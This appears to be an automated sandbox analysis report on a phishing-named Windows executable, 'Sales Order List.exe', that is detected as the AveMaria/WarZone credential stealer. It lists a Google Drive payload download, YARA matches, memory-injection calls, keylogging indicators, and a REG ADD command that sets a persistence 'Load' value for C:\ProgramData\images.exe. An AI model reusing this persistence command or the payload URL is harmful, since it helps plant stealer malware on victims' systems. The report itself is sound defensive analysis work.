Source: global traffic HTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49807 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: WerFault.exe, 00000014.00000003.125903793452.0000000002D9E000.00000004.00000001.sdmp Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
Installs a raw input device (often for capturing keystrokes)
Source: Sales Order List.exe Binary or memory string: GetRawInputData

E-Banking Fraud:

barindex
Yara detected AveMaria stealer
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Sales Order List.exe
Uses 32bit PE files
Source: Sales Order List.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
One or more processes crash
Source: C:\ProgramData\images.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
Detected potential crypto function
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E1E3D 2_2_022E1E3D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED671 2_2_022ED671
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F6B37 2_2_022F6B37
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDBA3 2_2_022EDBA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED01F 2_2_022ED01F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E3D31 2_2_022E3D31
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC22A 2_2_022EC22A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E4279 2_2_022E4279
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAE56 2_2_022EAE56
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E42A5 2_2_022E42A5
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAAA3 2_2_022EAAA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EA68C 2_2_022EA68C
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EE295 2_2_022EE295
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EA691 2_2_022EA691
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC2E4 2_2_022EC2E4
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBADD 2_2_022EBADD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E2ED9 2_2_022E2ED9
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E12D4 2_2_022E12D4
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBED0 2_2_022EBED0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F2B30 2_2_022F2B30
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4F00 2_2_022F4F00
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB34D 2_2_022EB34D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB745 2_2_022EB745
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E5B99 2_2_022E5B99
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E9FE8 2_2_022E9FE8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC7CD 2_2_022EC7CD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBBD1 2_2_022EBBD1
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC024 2_2_022EC024
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED414 2_2_022ED414
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED079 2_2_022ED079
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB0C8 2_2_022EB0C8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED8D8 2_2_022ED8D8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC539 2_2_022EC539
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E2D33 2_2_022E2D33
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3D63 2_2_022F3D63
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB98D 2_2_022EB98D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBD85 2_2_022EBD85
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4993 2_2_022F4993
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB5E0 2_2_022EB5E0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED5FC 2_2_022ED5FC
Source: C:\ProgramData\images.exe Code function: 15_2_02346B37 15_2_02346B37
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBA3 15_2_0233DBA3
Source: C:\ProgramData\images.exe Code function: 15_2_02343D63 15_2_02343D63
Source: C:\ProgramData\images.exe Code function: 15_2_02334279 15_2_02334279
Source: C:\ProgramData\images.exe Code function: 15_2_023342A5 15_2_023342A5
Source: C:\ProgramData\images.exe Code function: 15_2_0233E295 15_2_0233E295
Source: C:\ProgramData\images.exe Code function: 15_2_023312D4 15_2_023312D4
Source: C:\ProgramData\images.exe Code function: 15_2_02342B30 15_2_02342B30
Source: C:\ProgramData\images.exe Code function: 15_2_02344F00 15_2_02344F00
Source: C:\ProgramData\images.exe Code function: 15_2_02339FE8 15_2_02339FE8
Source: C:\ProgramData\images.exe Code function: 15_2_02333FD5 15_2_02333FD5
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBDF 15_2_0233DBDF
Source: C:\ProgramData\images.exe Code function: 15_2_0233D01F 15_2_0233D01F
Source: C:\ProgramData\images.exe Code function: 15_2_02344993 15_2_02344993
Source: C:\ProgramData\images.exe Code function: 15_2_0233D5FC 15_2_0233D5FC
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDBA3 NtAllocateVirtualMemory, 2_2_022EDBA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED01F NtWriteVirtualMemory, 2_2_022ED01F
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022E3D31 NtWriteVirtualMemory,TerminateProcess, 2_2_022E3D31
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F6548 NtProtectVirtualMemory, 2_2_022F6548
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC22A NtWriteVirtualMemory, 2_2_022EC22A
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDE40 NtAllocateVirtualMemory, 2_2_022EDE40
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAE56 NtWriteVirtualMemory, 2_2_022EAE56
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EAAA3 NtWriteVirtualMemory, 2_2_022EAAA3
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC2E4 NtWriteVirtualMemory, 2_2_022EC2E4
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBADD NtWriteVirtualMemory, 2_2_022EBADD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBED0 NtWriteVirtualMemory, 2_2_022EBED0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F4F00 NtWriteVirtualMemory,LoadLibraryA, 2_2_022F4F00
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB34D NtWriteVirtualMemory, 2_2_022EB34D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB745 NtWriteVirtualMemory, 2_2_022EB745
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC7CD NtWriteVirtualMemory, 2_2_022EC7CD
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBBD1 NtWriteVirtualMemory, 2_2_022EBBD1
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC024 NtWriteVirtualMemory, 2_2_022EC024
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB0C8 NtWriteVirtualMemory, 2_2_022EB0C8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022ED8D8 NtAllocateVirtualMemory, 2_2_022ED8D8
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EC539 NtWriteVirtualMemory, 2_2_022EC539
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EDD13 NtAllocateVirtualMemory, 2_2_022EDD13
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022F3D63 NtWriteVirtualMemory,LoadLibraryA, 2_2_022F3D63
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB98D NtWriteVirtualMemory, 2_2_022EB98D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EBD85 NtWriteVirtualMemory, 2_2_022EBD85
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 2_2_022EB5E0 NtWriteVirtualMemory, 2_2_022EB5E0
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_0167834D Sleep,NtProtectVirtualMemory, 4_2_0167834D
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_016780FC NtProtectVirtualMemory, 4_2_016780FC
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_01678529 NtProtectVirtualMemory, 4_2_01678529
Source: C:\Users\user\Desktop\Sales Order List.exe Code function: 4_2_016780F7 NtProtectVirtualMemory, 4_2_016780F7
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBA3 NtAllocateVirtualMemory, 15_2_0233DBA3
Source: C:\ProgramData\images.exe Code function: 15_2_0233DBDF NtAllocateVirtualMemory, 15_2_0233DBDF
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Sales Order List.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Sales Order List.exe, 00000002.00000000.125342747784.0000000000426000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
Source: Sales Order List.exe, 00000004.00000000.125542114197.0000000000426000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
Source: Sales Order List.exe Binary or memory string: OriginalFilenameBandies.exe vs Sales Order List.exe
PE file contains strange resources
Source: Sales Order List.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Sales Order List.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Sales Order List.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\ProgramData\images.exe Section loaded: edgegdi.dll Jump to behavior
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: Sales Order List.exe ReversingLabs: Detection: 40%
Source: C:\Users\user\Desktop\Sales Order List.exe File read: C:\Users\user\Desktop\Sales Order List.exe Jump to behavior
Source: Sales Order List.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Sales Order List.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\ProgramData\images.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740
Source: C:\ProgramData\images.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Users\user\Desktop\Sales Order List.exe "C:\Users\user\Desktop\Sales Order List.exe" Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\Users\user\AppData\Local\Microsoft Vision\ Jump to behavior
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\Users\user\AppData\Local\Temp\~DF052E41D7F13B5154.TMP Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@12/14@2/4
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4192
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
Source: C:\Users\user\Desktop\Sales Order List.exe File created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Sales Order List.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
